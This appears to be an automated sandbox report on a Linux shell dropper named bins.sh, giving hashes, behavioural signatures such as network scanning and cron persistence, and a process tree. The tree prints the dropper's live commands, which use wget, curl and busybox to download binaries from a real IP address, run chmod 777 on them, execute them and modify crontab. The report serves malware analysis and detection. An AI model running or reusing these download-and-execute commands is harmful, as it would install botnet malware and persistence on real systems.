Analysis
-
max time kernel
147s
-
max time network
150s
-
platform
ubuntu-18.04_amd64
-
resource
ubuntu1804-amd64-20240611-en
-
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
-
submitted
09-11-2024 07:14
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
acf9f575ad4baba7d6272ee313fb67e5
-
SHA1
8eeb94b3ee523a0d71cd2d8c1d5931fcde651e1a
-
SHA256
29b6fbf8520e38ee858951211cf8d6364128b9e1a351e9fcc96cf4dc06c45e87
-
SHA512
13a836bc239e2e1ccc70a558add24a0e74bac3382834b06489b8a316519a5376874cde608c0546de15bcd6aebd9c903089a751b52d7d40ad4a0f2cd6549b6c3d
-
SSDEEP
96:yTPLN/mDiM57xKWeDvfo4458rr4cNXpfCT/invORL57RE684cN3KWeDvfJu4458L:cPRWiM3KWevfnKWevfP
Malware Config
Signatures
-
Contacts a large (2122) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid  process
1517  chmod
1524  chmod
1531  chmod
1510  chmod
-
Executes dropped EXE 4 IoCs
Processes:
ioc  pid  process
/tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  1511  XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
/tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  1518  7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
/tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  1525  okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
/tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  1532  yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
-
Renames itself 1 IoCs
Processes:
pid  process
1533  yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description  ioc  process
File opened for modification  /var/spool/cron/crontabs/tmp.K46dZ3  crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
process: yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
description: File opened for reading
ioc:
/proc/1828/cmdline
/proc/1308/cmdline
/proc/1502/cmdline
/proc/1556/cmdline
/proc/15/cmdline
/proc/178/cmdline
/proc/1547/cmdline
/proc/1741/cmdline
/proc/1646/cmdline
/proc/137/cmdline
/proc/463/cmdline
/proc/1584/cmdline
/proc/1685/cmdline
/proc/1763/cmdline
/proc/435/cmdline
/proc/721/cmdline
/proc/1635/cmdline
/proc/1675/cmdline
/proc/1698/cmdline
/proc/1625/cmdline
/proc/1580/cmdline
/proc/1650/cmdline
/proc/1664/cmdline
/proc/1679/cmdline
/proc/1682/cmdline
/proc/1548/cmdline
/proc/1629/cmdline
/proc/1094/cmdline
/proc/1595/cmdline
/proc/5/cmdline
/proc/1027/cmdline
/proc/1693/cmdline
/proc/1701/cmdline
/proc/1377/cmdline
/proc/1554/cmdline
/proc/1564/cmdline
/proc/957/cmdline
/proc/1673/cmdline
/proc/1723/cmdline
/proc/449/cmdline
/proc/1496/cmdline
/proc/1771/cmdline
/proc/1590/cmdline
/proc/1758/cmdline
/proc/1819/cmdline
/proc/530/cmdline
/proc/1716/cmdline
/proc/1751/cmdline
/proc/1835/cmdline
/proc/115/cmdline
/proc/161/cmdline
/proc/1181/cmdline
/proc/1551/cmdline
/proc/1623/cmdline
/proc/1718/cmdline
/proc/1749/cmdline
/proc/1706/cmdline
/proc/1713/cmdline
/proc/1804/cmdline
/proc/1807/cmdline
/proc/12/cmdline
/proc/165/cmdline
/proc/1143/cmdline
/proc/1152/cmdline
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description  ioc  process
File opened for modification  /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  busybox
File opened for modification  /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  wget
File opened for modification  /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  busybox
File opened for modification  /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  wget
File opened for modification  /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  curl
File opened for modification  /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  busybox
File opened for modification  /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  curl
File opened for modification  /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  curl
File opened for modification  /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  busybox
File opened for modification  /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  curl
File opened for modification  /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  wget
File opened for modification  /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  wget
Processes
- PID:1502  /tmp/bins.sh  cmdline: bins.sh
  - PID:1503  /bin/rm  cmdline: /bin/rm bins.sh
  - PID:1504  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  [Writes file to tmp directory]
  - PID:1508  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  [Writes file to tmp directory]
  - PID:1509  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  [Writes file to tmp directory]
  - PID:1510  /bin/chmod  cmdline: chmod 777 XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  [File and Directory Permissions Modification]
  - PID:1511  /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  cmdline: ./XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa  [Executes dropped EXE]
  - PID:1513  /bin/rm  cmdline: rm XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
  - PID:1514  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  [Writes file to tmp directory]
  - PID:1515  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  [Writes file to tmp directory]
  - PID:1516  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  [Writes file to tmp directory]
  - PID:1517  /bin/chmod  cmdline: chmod 777 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  [File and Directory Permissions Modification]
  - PID:1518  /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  cmdline: ./7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B  [Executes dropped EXE]
  - PID:1520  /bin/rm  cmdline: rm 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
  - PID:1521  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  [Writes file to tmp directory]
  - PID:1522  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  [Writes file to tmp directory]
  - PID:1523  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  [Writes file to tmp directory]
  - PID:1524  /bin/chmod  cmdline: chmod 777 okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  [File and Directory Permissions Modification]
  - PID:1525  /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  cmdline: ./okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy  [Executes dropped EXE]
  - PID:1527  /bin/rm  cmdline: rm okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
  - PID:1528  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  [Writes file to tmp directory]
  - PID:1529  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  [Writes file to tmp directory]
  - PID:1530  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  [Writes file to tmp directory]
  - PID:1531  /bin/chmod  cmdline: chmod 777 yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  [File and Directory Permissions Modification]
  - PID:1532  /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  cmdline: ./yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C  [Executes dropped EXE; Renames itself; Reads runtime system information]
    - PID:1534  /bin/sh  cmdline: sh -c "crontab -l"
      - PID:1535  /usr/bin/crontab  cmdline: crontab -l
    - PID:1536  /bin/sh  cmdline: sh -c "crontab -"
      - PID:1537  /usr/bin/crontab  cmdline: crontab -  [Creates/modifies Cron job]
  - PID:1539  /bin/rm  cmdline: rm yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
  - PID:1542  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/bE1wZrR3LkaqAP5wPtbqf6sNNmp0d9shLL
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
107KB
MD5
eb9c3a0de91fcf16ba17cb24608df68c
SHA1
09d95a7d70d5e115d103be51edff7c498d272fac
SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
141KB
MD5
3ca8decdb1e52c423c521bfff02ac200
SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
117KB
MD5
849fa04ef88a8e8de32cb2e8538de5fe
SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
112KB
MD5
05d7857dcead18bbd86d2935f591873c
SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985
SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5
a132196ae4d569319532ad392329f212
SHA1
837da12055a7d99b6a2d08b59c2650503fdf4fba
SHA256
e4c2d190b56613e31b0b376525e89a6b956b1c84fd07f94ba206cca99cb2dfba
SHA512
3572470e974a9d748dbf639d2197799676c98a9e344de9ff401c063df4bcb8cec3da202fd8c86d0ef732a635a105467acc95ea39c4e1b9e588c6712cdb0f9baa